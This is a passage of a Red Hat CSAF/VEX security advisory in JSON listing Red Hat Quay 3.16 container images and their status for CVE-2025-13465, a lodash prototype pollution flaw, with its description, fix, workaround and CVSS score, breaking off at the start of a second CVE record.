"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64",
"relates_to_product_reference": "Red Hat Quay 3.16"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-13465",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2026-01-21T20:01:28.774829+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431740"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: prototype pollution in _.unset and _.omit functions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only exploitable by applications using the _.unset and _.omit functions on an object and allowing user input to determine the path of the property to be removed. This issue only allows the deletion of properties but does not allow overwriting their behavior, limiting the impact to a denial of service. Due to this reason, this vulnerability has been rated with an important severity.\n\nIn Grafana, JavaScript code runs only in the browser, while the server side is all Golang. Therefore, the worst-case scenario is a loss of functionality in the client application inside the browser. To reflect this, the CVSS availability metric and the severity of the Grafana and the Grafana-PCP component have been updated to low and moderate, respectively.\n\nThe lodash dependency is bundled and used by the pcs-web-ui component of the PCS package. In Red Hat Enterprise Linux 8.10, the pcs-web-ui component is no longer included in the PCS package. As a result, RHEL 8.10 does not ship the vulnerable lodash component within PCS and is therefore not-affected by this CVE.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "RHBZ#2431740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"
}
],
"release_date": "2026-01-21T19:05:28.846000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement strict input validation before passing any property paths to the _.unset and _.omit functions to block attempts to access the prototype chain. Ensure that strings like __proto__, constructor and prototype are blocked, for example.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: prototype pollution in _.unset and _.omit functions"
},
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
